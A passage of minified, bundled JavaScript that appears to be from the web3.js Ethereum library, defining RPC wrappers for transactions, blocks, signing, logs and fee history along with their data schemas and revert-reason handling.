                            n = yield l.ethRpcMethods.getBlockTransactionCountByHash(e.requestManager, r);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockTransactionCountByNumber(e.requestManager, r);
                        }
                        return (0, s.format)({
                            format: "uint"
                        }, n, r);
                    });
                }, t.getBlockUncleCount = function(e, t = e.defaultBlock, r) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getUncleCountByBlockHash(e.requestManager, r);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getUncleCountByBlockNumber(e.requestManager, r);
                        }
                        return (0, s.format)({
                            format: "uint"
                        }, n, r);
                    });
                }, t.getUncle = function(e, t = e.defaultBlock, r, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT);
                        let a;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getUncleByBlockHashAndIndex(e.requestManager, r, n);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getUncleByBlockNumberAndIndex(e.requestManager, r, n);
                        }
                        return (0, s.format)(h.blockSchema, a, o);
                    });
                }, t.getTransaction = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "bytes32"
                        }, t, i.DEFAULT_RETURN_FORMAT), o = yield l.ethRpcMethods.getTransactionByHash(e.requestManager, n);
                        return (0, u.isNullish)(o) ? o : (0, p.formatTransaction)(o, r, {
                            transactionSchema: h.transactionInfoSchema
                        });
                    });
                }, t.getPendingTransactions = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return (yield l.ethRpcMethods.getPendingTransactions(e.requestManager)).map((e)=>(0, p.formatTransaction)(e, t));
                    });
                }, t.getTransactionFromBlock = function(e, t = e.defaultBlock, r, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT);
                        let a;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getTransactionByBlockHashAndIndex(e.requestManager, r, n);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getTransactionByBlockNumberAndIndex(e.requestManager, r, n);
                        }
                        return (0, u.isNullish)(a) ? a : (0, p.formatTransaction)(a, o, {
                            transactionSchema: h.transactionInfoSchema
                        });
                    });
                }, t.getTransactionReceipt = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "bytes32"
                        }, t, i.DEFAULT_RETURN_FORMAT), o = yield l.ethRpcMethods.getTransactionReceipt(e.requestManager, n);
                        return (0, u.isNullish)(o) ? o : (0, s.format)(h.transactionReceiptSchema, o, r);
                    });
                }, t.getTransactionCount = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.getTransactionCount(e.requestManager, t, n);
                        return (0, s.format)({
                            format: "uint"
                        }, a, o);
                    });
                }, t.sendTransaction = function(e, t, r, a = {
                    checkRevertBeforeSending: !0
                }) {
                    const d = new o.Web3PromiEvent((o, b)=>{
                        setImmediate(()=>{
                            (()=>{
                                n(this, void 0, void 0, function*() {
                                    let _ = (0, p.formatTransaction)(Object.assign(Object.assign({}, t), {
                                        from: (0, f.getTransactionFromOrToAttr)("from", e, t),
                                        to: (0, f.getTransactionFromOrToAttr)("to", e, t)
                                    }), i.ETH_DATA_FORMAT);
                                    !(null == a ? void 0 : a.ignoreGasPricing) && (0, u.isNullish)(_.gasPrice) && ((0, u.isNullish)(t.maxPriorityFeePerGas) || (0, u.isNullish)(t.maxFeePerGas)) && (_ = Object.assign(Object.assign({}, _), (yield (0, m.getTransactionGasPricing)(_, e, i.ETH_DATA_FORMAT))));
                                    try {
                                        if (!1 !== a.checkRevertBeforeSending) {
                                            const t = yield (0, A.getRevertReason)(e, _, a.contractAbi);
                                            if (void 0 !== t) {
                                                const r = yield (0, E.getTransactionError)(e, _, void 0, void 0, a.contractAbi, t);
                                                return d.listenerCount("error") > 0 && d.emit("error", r), void b(r);
                                            }
                                        }
                                        let t, i;
                                        if (d.listenerCount("sending") > 0 && d.emit("sending", _), e.wallet && !(0, u.isNullish)(_.from) && (i = e.wallet.get(_.from)), i) {
                                            const r = yield i.signTransaction(_);
                                            t = yield (0, g.trySendTransaction)(e, ()=>n(this, void 0, void 0, function*() {
                                                    return l.ethRpcMethods.sendRawTransaction(e.requestManager, r.rawTransaction);
                                                }), r.transactionHash);
                                        } else t = yield (0, g.trySendTransaction)(e, ()=>n(this, void 0, void 0, function*() {
                                                return l.ethRpcMethods.sendTransaction(e.requestManager, _);
                                            }));
                                        const c = (0, s.format)({
                                            format: "bytes32"
                                        }, t, r);
                                        d.listenerCount("sent") > 0 && d.emit("sent", _), d.listenerCount("transactionHash") > 0 && d.emit("transactionHash", c);
                                        const f = yield (0, y.waitForTransactionReceipt)(e, t, r), p = (0, s.format)(h.transactionReceiptSchema, f, r);
                                        if (d.listenerCount("receipt") > 0 && d.emit("receipt", p), null == a ? void 0 : a.transactionResolver) o(null == a ? void 0 : a.transactionResolver(p));
                                        else if (f.status === BigInt(0)) {
                                            const t = yield (0, E.getTransactionError)(e, _, p, void 0, null == a ? void 0 : a.contractAbi);
                                            d.listenerCount("error") > 0 && d.emit("error", t), b(t);
                                        } else o(p);
                                        d.listenerCount("confirmation") > 0 && (0, v.watchTransactionForConfirmations)(e, d, p, t, r);
                                    } catch (t) {
                                        let r = t;
                                        r instanceof c.ContractExecutionError && e.handleRevert && (r = yield (0, E.getTransactionError)(e, _, void 0, void 0, null == a ? void 0 : a.contractAbi)), (r instanceof c.InvalidResponseError || r instanceof c.ContractExecutionError || r instanceof c.TransactionRevertWithCustomError || r instanceof c.TransactionRevertedWithoutReasonError || r instanceof c.TransactionRevertInstructionError) && d.listenerCount("error") > 0 && d.emit("error", r), b(r);
                                    }
                                });
                            })();
                        });
                    });
                    return d;
                }, t.sendSignedTransaction = function(e, t, r, u = {
                    checkRevertBeforeSending: !0
                }) {
                    const d = new o.Web3PromiEvent((o, f)=>{
                        setImmediate(()=>{
                            (()=>{
                                n(this, void 0, void 0, function*() {
                                    const p = (0, s.format)({
                                        format: "bytes"
                                    }, t, i.ETH_DATA_FORMAT), m = a.TransactionFactory.fromSerializedData((0, s.bytesToUint8Array)((0, s.hexToBytes)(p))), b = Object.assign(Object.assign({}, m.toJSON()), {
                                        from: m.getSenderAddress().toString()
                                    });
                                    try {
                                        if (!1 !== u.checkRevertBeforeSending) {
                                            const t = yield (0, A.getRevertReason)(e, b, u.contractAbi);
                                            if (void 0 !== t) {
                                                const r = yield (0, E.getTransactionError)(e, b, void 0, void 0, u.contractAbi, t);
                                                return d.listenerCount("error") > 0 && d.emit("error", r), void f(r);
                                            }
                                        }
                                        d.listenerCount("sending") > 0 && d.emit("sending", p);
                                        const t = yield (0, g.trySendTransaction)(e, ()=>n(this, void 0, void 0, function*() {
                                                return l.ethRpcMethods.sendRawTransaction(e.requestManager, p);
                                            }));
                                        d.listenerCount("sent") > 0 && d.emit("sent", p);
                                        const i = (0, s.format)({
                                            format: "bytes32"
                                        }, t, r);
                                        d.listenerCount("transactionHash") > 0 && d.emit("transactionHash", i);
                                        const a = yield (0, y.waitForTransactionReceipt)(e, t, r), c = (0, s.format)(h.transactionReceiptSchema, a, r);
                                        if (d.listenerCount("receipt") > 0 && d.emit("receipt", c), null == u ? void 0 : u.transactionResolver) o(null == u ? void 0 : u.transactionResolver(c));
                                        else if (a.status === BigInt(0)) {
                                            const t = yield (0, E.getTransactionError)(e, b, c, void 0, null == u ? void 0 : u.contractAbi);
                                            d.listenerCount("error") > 0 && d.emit("error", t), f(t);
                                        } else o(c);
                                        d.listenerCount("confirmation") > 0 && (0, v.watchTransactionForConfirmations)(e, d, c, t, r);
                                    } catch (t) {
                                        let r = t;
                                        r instanceof c.ContractExecutionError && e.handleRevert && (r = yield (0, E.getTransactionError)(e, b, void 0, void 0, null == u ? void 0 : u.contractAbi)), (r instanceof c.InvalidResponseError || r instanceof c.ContractExecutionError || r instanceof c.TransactionRevertWithCustomError || r instanceof c.TransactionRevertedWithoutReasonError || r instanceof c.TransactionRevertInstructionError) && d.listenerCount("error") > 0 && d.emit("error", r), f(r);
                                    }
                                });
                            })();
                        });
                    });
                    return d;
                }, t.sign = function(e, t, r, o) {
                    var a;
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "bytes"
                        }, t, i.DEFAULT_RETURN_FORMAT);
                        if (null === (a = e.wallet) || void 0 === a ? void 0 : a.get(r)) {
                            const t = e.wallet.get(r).sign(n);
                            return (0, s.format)(h.SignatureObjectSchema, t, o);
                        }
                        if ("number" == typeof r) throw new c.SignatureError(t, 'RPC method "eth_sign" does not support index signatures');
                        const u = yield l.ethRpcMethods.sign(e.requestManager, r, n);
                        return (0, s.format)({
                            format: "bytes"
                        }, u, o);
                    });
                }, t.signTransaction = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const n = yield l.ethRpcMethods.signTransaction(e.requestManager, (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT));
                        return (0, u.isString)(n) ? (0, d.decodeSignedTransaction)(n, r) : {
                            raw: (0, s.format)({
                                format: "bytes"
                            }, n.raw, r),
                            tx: (0, p.formatTransaction)(n.tx, r)
                        };
                    });
                }, t.call = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.call(e.requestManager, (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT), n);
                        return (0, s.format)({
                            format: "bytes"
                        }, a, o);
                    });
                }, t.estimateGas = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT), a = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), c = yield l.ethRpcMethods.estimateGas(e.requestManager, n, a);
                        return (0, s.format)({
                            format: "uint"
                        }, c, o);
                    });
                }, t.getLogs = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        let { toBlock: n, fromBlock: i } = t;
                        (0, u.isNullish)(n) || "number" != typeof n && "bigint" != typeof n || (n = (0, s.numberToHex)(n)), (0, u.isNullish)(i) || "number" != typeof i && "bigint" != typeof i || (i = (0, s.numberToHex)(i));
                        const o = Object.assign(Object.assign({}, t), {
                            fromBlock: i,
                            toBlock: n
                        });
                        return (yield l.ethRpcMethods.getLogs(e.requestManager, o)).map((e)=>"string" == typeof e ? e : (0, s.format)(h.logSchema, e, r));
                    });
                }, t.getChainId = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getChainId(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getProof = function(e, t, r, o = e.defaultBlock, a) {
                    return n(this, void 0, void 0, function*() {
                        const n = r.map((e)=>(0, s.format)({
                                format: "bytes"
                            }, e, i.ETH_DATA_FORMAT)), c = (0, u.isBlockTag)(o) ? o : (0, s.format)({
                            format: "uint"
                        }, o, i.ETH_DATA_FORMAT), d = yield l.ethRpcMethods.getProof(e.requestManager, t, n, c);
                        return (0, s.format)(h.accountSchema, d, a);
                    });
                }, t.getFeeHistory = function(e, t, r = e.defaultBlock, o, a) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, t, i.ETH_DATA_FORMAT), c = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), d = (0, s.format)({
                            type: "array",
                            items: {
                                format: "uint"
                            }
                        }, o, b.NUMBER_DATA_FORMAT), f = yield l.ethRpcMethods.getFeeHistory(e.requestManager, n, c, d);
                        return (0, s.format)(h.feeHistorySchema, f, a);
                    });
                }, t.createAccessList = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.createAccessList(e.requestManager, (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT), n);
                        return (0, s.format)(h.accessListResultSchema, a, o);
                    });
                };
            },
            1922: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.accountSchema = t.storageProofSchema = t.feeHistorySchema = t.SignatureObjectSchema = t.transactionReceiptSchema = t.syncSchema = t.logSchema = t.blockHeaderSchema = t.blockSchema = t.transactionInfoSchema = t.transactionSchema = t.customChainSchema = t.hardforkSchema = t.chainSchema = t.accessListResultSchema = t.accessListSchema = t.accessListItemSchema = void 0, t.accessListItemSchema = {
                    type: "object",
                    properties: {
                        address: {
                            format: "address"
                        },
                        storageKeys: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        }
                    }
                }, t.accessListSchema = {
                    type: "array",
                    items: Object.assign({}, t.accessListItemSchema)
                }, t.accessListResultSchema = {
                    type: "object",
                    properties: {
                        accessList: Object.assign({}, t.accessListSchema),
                        gasUsed: {
                            type: "string"
                        }
                    }
                }, t.chainSchema = {
                    type: "string",
                    enum: [
                        "goerli",
                        "kovan",
                        "mainnet",
                        "rinkeby",
                        "ropsten",
                        "sepolia"
                    ]
                }, t.hardforkSchema = {
                    type: "string",
                    enum: [
                        "arrowGlacier",
                        "berlin",
                        "byzantium",
                        "chainstart",
                        "constantinople",
                        "dao",
                        "homestead",
                        "istanbul",
                        "london",
                        "merge",
                        "muirGlacier",
                        "petersburg",
                        "shanghai",
                        "spuriousDragon",
                        "tangerineWhistle"
                    ]
                }, t.customChainSchema = {
                    type: "object",
                    properties: {
                        name: {
                            format: "string"
                        },
                        networkId: {
                            format: "uint"
                        },
                        chainId: {
                            format: "uint"
                        }
                    }
                }, t.transactionSchema = {
                    type: "object",
                    properties: {
                        from: {
                            format: "address"
                        },
                        to: {
                            oneOf: [
                                {
                                    format: "address"
                                },
                                {
                                    type: "null"
                                }
                            ]
                        },
                        value: {
                            format: "uint"
                        },
                        gas: {
                            format: "uint"
                        },
                        gasPrice: {
                            format: "uint"
                        },
                        effectiveGasPrice: {
                            format: "uint"
                        },
                        type: {
                            format: "uint"
                        },
                        maxFeePerGas: {
                            format: "uint"
                        },
                        maxPriorityFeePerGas: {
                            format: "uint"
                        },
                        accessList: Object.assign({}, t.accessListSchema),
                        data: {
                            format: "bytes"
                        },
                        input: {
                            format: "bytes"
                        },
                        nonce: {
                            format: "uint"
                        },
                        chain: Object.assign({}, t.chainSchema),
                        hardfork: Object.assign({}, t.hardforkSchema),
                        chainId: {
                            format: "uint"
                        },
                        networkId: {
                            format: "uint"
                        },
                        common: {
                            type: "object",
                            properties: {
                                customChain: Object.assign({}, t.customChainSchema),
                                baseChain: Object.assign({}, t.chainSchema),
                                hardfork: Object.assign({}, t.hardforkSchema)
                            }
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        v: {
                            format: "uint"
                        },
                        r: {
                            format: "bytes32"
                        },
                        s: {
                            format: "bytes32"
                        }
                    }
                }, t.transactionInfoSchema = {
                    type: "object",
                    properties: Object.assign(Object.assign({}, t.transactionSchema.properties), {
                        blockHash: {
                            format: "bytes32"
                        },
                        blockNumber: {
                            format: "uint"
                        },
                        hash: {
                            format: "bytes32"
                        },
                        transactionIndex: {
                            format: "uint"
                        },
                        from: {
                            format: "address"
                        },
                        to: {
                            oneOf: [
                                {
                                    format: "address"
                                },
                                {
                                    type: "null"
                                }
                            ]
                        },
                        value: {
                            format: "uint"
                        },
                        gas: {
                            format: "uint"
                        },
                        gasPrice: {
                            format: "uint"
                        },
                        effectiveGasPrice: {
                            format: "uint"
                        },
                        type: {
                            format: "uint"
                        },
                        maxFeePerGas: {
                            format: "uint"
                        },
                        maxPriorityFeePerGas: {
                            format: "uint"
                        },
                        accessList: Object.assign({}, t.accessListSchema),
                        data: {
                            format: "bytes"
                        },
                        input: {
                            format: "bytes"
                        },
                        nonce: {
                            format: "uint"
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        v: {
                            format: "uint"
                        },
                        r: {
                            format: "bytes32"
                        },
                        s: {
                            format: "bytes32"
                        }
                    })
                }, t.blockSchema = {
                    type: "object",
                    properties: {
                        parentHash: {
                            format: "bytes32"
                        },
                        sha3Uncles: {
                            format: "bytes32"
                        },
                        miner: {
                            format: "bytes"
                        },
                        stateRoot: {
                            format: "bytes32"
                        },
                        transactionsRoot: {
                            format: "bytes32"
                        },
                        receiptsRoot: {
                            format: "bytes32"
                        },
                        logsBloom: {
                            format: "bytes256"
                        },
                        difficulty: {
                            format: "uint"
                        },
                        number: {
                            format: "uint"
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        gasUsed: {
                            format: "uint"
                        },
                        timestamp: {
                            format: "uint"
                        },
                        extraData: {
                            format: "bytes"
                        },
                        mixHash: {
                            format: "bytes32"
                        },
                        nonce: {
                            format: "uint"
                        },
                        totalDifficulty: {
                            format: "uint"
                        },
                        baseFeePerGas: {
                            format: "uint"
                        },
                        size: {
                            format: "uint"
                        },
                        transactions: {
                            oneOf: [
                                {
                                    type: "array",
                                    items: Object.assign({}, t.transactionInfoSchema)
                                },
                                {
                                    type: "array",
                                    items: {
                                        format: "bytes32"
                                    }
                                }
                            ]
                        },
                        uncles: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        },
                        hash: {
                            format: "bytes32"
                        }
                    }
                }, t.blockHeaderSchema = {
                    type: "object",
                    properties: {
                        parentHash: {
                            format: "bytes32"
                        },
                        receiptRoot: {
                            format: "bytes32"
                        },
                        miner: {
                            format: "bytes"
                        },
                        stateRoot: {
                            format: "bytes32"
                        },
                        transactionsRoot: {
                            format: "bytes32"
                        },
                        logsBloom: {
                            format: "bytes256"
                        },
                        difficulty: {
                            format: "uint"
                        },
                        number: {
                            format: "uint"
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        gasUsed: {
                            format: "uint"
                        },
                        timestamp: {
                            format: "uint"
                        },
                        extraData: {
                            format: "bytes"
                        },
                        nonce: {
                            format: "uint"
                        },
                        sha3Uncles: {
                            format: "bytes32"
                        }
                    }
                }, t.logSchema = {
                    type: "object",
                    properties: {
                        removed: {
                            format: "bool"
                        },
                        logIndex: {
                            format: "uint"
                        },
                        transactionIndex: {
                            format: "uint"
                        },
                        transactionHash: {
                            format: "bytes32"
                        },
                        blockHash: {
                            format: "bytes32"
                        },
                        blockNumber: {
                            format: "uint"
                        },
                        address: {
                            format: "address"
                        },
                        data: {
                            format: "bytes"
                        },
                        topics: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        }
                    }
                }, t.syncSchema = {
                    type: "object",
                    properties: {
                        startingBlock: {
                            format: "string"
                        },
                        currentBlock: {
                            format: "string"
                        },
                        highestBlock: {
                            format: "string"
                        },
                        knownStates: {
                            format: "string"
                        },
                        pulledStates: {
                            format: "string"
                        }
                    }
                }, t.transactionReceiptSchema = {
                    type: "object",
                    properties: {
                        transactionHash: {
                            format: "bytes32"
                        },
                        transactionIndex: {
                            format: "uint"
                        },
                        blockHash: {
                            format: "bytes32"
                        },
                        blockNumber: {
                            format: "uint"
                        },
                        from: {
                            format: "address"
                        },
                        to: {
                            format: "address"
                        },
                        cumulativeGasUsed: {
                            format: "uint"
                        },
                        gasUsed: {
                            format: "uint"
                        },
                        effectiveGasPrice: {
                            format: "uint"
                        },
                        contractAddress: {
                            format: "address"
                        },
                        logs: {
                            type: "array",
                            items: Object.assign({}, t.logSchema)
                        },
                        logsBloom: {
                            format: "bytes"
                        },
                        root: {
                            format: "bytes"
                        },
                        status: {
                            format: "uint"
                        },
                        type: {
                            format: "uint"
                        }
                    }
                }, t.SignatureObjectSchema = {
                    type: "object",
                    properties: {
                        messageHash: {
                            format: "bytes"
                        },
                        r: {
                            format: "bytes32"
                        },
                        s: {
                            format: "bytes32"
                        },
                        v: {
                            format: "bytes"
                        },
                        message: {
                            format: "bytes"
                        },
                        signature: {
                            format: "bytes"
                        }
                    }
                }, t.feeHistorySchema = {
                    type: "object",
                    properties: {
                        oldestBlock: {
                            format: "uint"
                        },
                        baseFeePerGas: {
                            type: "array",
                            items: {
                                format: "uint"
                            }
                        },
                        reward: {
                            type: "array",
                            items: {
                                type: "array",
                                items: {
                                    format: "uint"
                                }
                            }
                        },
                        gasUsedRatio: {
                            type: "array",
                            items: {
                                type: "number"
                            }
                        }
                    }
                }, t.storageProofSchema = {
                    type: "object",
                    properties: {
                        key: {
                            format: "bytes32"
                        },
                        value: {
                            format: "uint"
                        },
                        proof: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        }
                    }
                }, t.accountSchema = {
                    type: "object",
                    properties: {
                        balance: {
                            format: "uint"
                        },
                        codeHash: {
                            format: "bytes32"
                        },
                        nonce: {
                            format: "uint"
                        },
                        storageHash: {
                            format: "bytes32"
                        },
                        accountProof: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        },
                        storageProof: {
                            type: "array",
                            items: Object.assign({}, t.storageProofSchema)
                        }
                    }
                };
            },
            4832: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            5900: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeSignedTransaction = void 0;
                const n = r(9634), i = r(9247), o = r(7350), s = r(5140);
                t.decodeSignedTransaction = function(e, t) {
                    return {
                        raw: (0, n.format)({
                            format: "bytes"
                        }, e, t),
                        tx: (0, s.formatTransaction)(Object.assign(Object.assign({}, i.TransactionFactory.fromSerializedData((0, n.hexToBytes)(e)).toJSON()), {
                            hash: (0, n.bytesToHex)((0, n.keccak256)((0, n.hexToBytes)(e))),
                            type: (0, o.detectRawTransactionType)((0, n.hexToBytes)(e))
                        }), t)
                    };
                };
            },
            7350: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.detectRawTransactionType = t.detectTransactionType = t.defaultTransactionTypeParser = void 0;
                const n = r(9634), i = r(9970), o = r(7345), s = r(5071), a = {
                    type: "object",
                    properties: {
                        accessList: {
                            type: "null"
                        },
                        maxFeePerGas: {
                            type: "null"
                        },
                        maxPriorityFeePerGas: {
                            type: "null"
                        }
                    }
                }, u = {
                    type: "object",
                    properties: {
                        maxFeePerGas: {
                            type: "null"
                        },
                        maxPriorityFeePerGas: {
                            type: "null"
                        }
                    }
                }, c = {
                    type: "object",
                    properties: {
                        gasPrice: {
                            type: "null"
                        }
                    }
                }, l = (e, t, r)=>{
                    try {
                        o.validator.validateJSONSchema(e, t);
                    } catch (e) {
                        if (e instanceof o.Web3ValidatorError) throw new s.InvalidPropertiesForTransactionTypeError(e.errors, r);
                        throw e;
                    }
                };
                t.defaultTransactionTypeParser = (e)=>{
                    var t, r;
                    const s = e;
                    if (!(0, o.isNullish)(s.type)) {
                        let e;
                        switch(s.type){
                            case "0x0":
                                e = a;
                                break;
                            case "0x1":
                                e = u;
                                break;
                            case "0x2":
                                e = c;
                                break;
                            default:
                                return (0, n.format)({
                                    format: "uint"
                                }, s.type, i.ETH_DATA_FORMAT);
                        }
                        return l(e, s, s.type), (0, n.format)({
                            format: "uint"
                        }, s.type, i.ETH_DATA_FORMAT);
                    }
                    if (!(0, o.isNullish)(s.maxFeePerGas) || !(0, o.isNullish)(s.maxPriorityFeePerGas)) return l(c, s, "0x2"), "0x2";
                    if (!(0, o.isNullish)(s.accessList)) return l(u, s, "0x1"), "0x1";
                    (0, o.isNullish)(s.gasPrice) || l(a, s, "0x0");
                    const d = null !== (t = s.hardfork) && void 0 !== t ? t : null === (r = s.common) || void 0 === r ? void 0 : r.hardfork;
                    if (void 0 === d) return;
                    const h = Object.keys(i.HardforksOrdered).indexOf(d);
                    return void 0 !== h ? h >= Object.keys(i.HardforksOrdered).indexOf("london") ? (0, o.isNullish)(s.gasPrice) ? "0x2" : "0x0" : h === Object.keys(i.HardforksOrdered).indexOf("berlin") ? "0x0" : void 0 : void 0;
                }, t.detectTransactionType = (e, r)=>{
                    var n;
                    return (null !== (n = null == r ? void 0 : r.transactionTypeParser) && void 0 !== n ? n : t.defaultTransactionTypeParser)(e);
                }, t.detectRawTransactionType = (e)=>e[0] > 127 ? "0x0" : (0, n.toHex)(e[0]);
            },
            5140: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.formatTransaction = void 0;
                const n = r(9970), i = r(7345), o = r(5071), s = r(9634), a = r(1922);
                t.formatTransaction = function(e, t = n.DEFAULT_RETURN_FORMAT, r = {
                    transactionSchema: a.transactionSchema
                }) {
                    var u;
                    let c = (0, s.mergeDeep)({}, e);
                    if ((0, i.isNullish)(null == e ? void 0 : e.common) || (c.common = Object.assign({}, e.common), (0, i.isNullish)(null === (u = e.common) || void 0 === u ? void 0 : u.customChain) || (c.common.customChain = Object.assign({}, e.common.customChain))), c = (0, s.format)(r.transactionSchema, c, t), (0, i.isNullish)(c.data)) (0, i.isNullish)(c.input) || (c.data = c.input);
                    else {
                        if (!(0, i.isNullish)(c.input) && c.data !== c.input) throw new o.TransactionDataAndInputError({
                            data: (0, s.bytesToHex)(c.data),
                            input: (0, s.bytesToHex)(c.input)
                        });
                        c.input = c.data;
                    }
                    return (0, i.isNullish)(c.gasLimit) || (c.gas = c.gasLimit, delete c.gasLimit), c;
                };
            },
            4429: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getRevertReason = t.parseTransactionError = void 0;
                const i = r(5071), o = r(8381), s = r(9970), a = r(3222);
                t.parseTransactionError = (e, t)=>{
                    var r, n, s, a;
                    if (e instanceof i.ContractExecutionError && e.innerError instanceof i.Eip838ExecutionError) {
                        if (void 0 !== t) {
                            const i = t.filter((e)=>(0, o.isAbiErrorFragment)(e));
                            return (0, o.decodeContractErrorData)(i, e.innerError), {
                                reason: e.innerError.message,
                                signature: null === (r = e.innerError.data) || void 0 === r ? void 0 : r.slice(0, 10),
                                data: null === (n = e.innerError.data) || void 0 === n ? void 0 : n.substring(10),
                                customErrorName: e.innerError.errorName,
                                customErrorDecodedSignature: e.innerError.errorSignature,
                                customErrorArguments: e.innerError.errorArgs
                            };
                        }
                        return {
                            reason: e.innerError.message,
                            signature: null === (s = e.innerError.data) || void 0 === s ? void 0 : s.slice(0, 10),
                            data: null === (a = e.innerError.data) || void 0 === a ? void 0 : a.substring(10)
                        };
                    }
                    if (e instanceof i.InvalidResponseError && !Array.isArray(e.innerError) && void 0 !== e.innerError) return e.innerError.message;
                    throw e;
                }, t.getRevertReason = function(e, r, i, o = s.DEFAULT_RETURN_FORMAT) {
                    return n(this, void 0, void 0, function*() {
                        try {
                            return void (yield (0, a.call)(e, r, e.defaultBlock, o));
                        } catch (e) {
                            return (0, t.parseTransactionError)(e, i);
                        }
                    });
                };
            },
            1882: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getTransactionError = void 0;
                const i = r(5071), o = r(4429);
                t.getTransactionError = function(e, t, r, s, a, u) {
                    return n(this, void 0, void 0, function*() {
                        let n, c = u;
                        if (void 0 === c && (void 0 !== s ? c = (0, o.parseTransactionError)(s) : e.handleRevert && void 0 !== t && (c = yield (0, o.getRevertReason)(e, t, a))), void 0 === c) n = new i.TransactionRevertedWithoutReasonError(r);
                        else if ("string" == typeof c) n = new i.TransactionRevertInstructionError(c, void 0, r);
                        else if (void 0 !== c.customErrorName && void 0 !== c.customErrorDecodedSignature && void 0 !== c.customErrorArguments) {
                            const e = c;
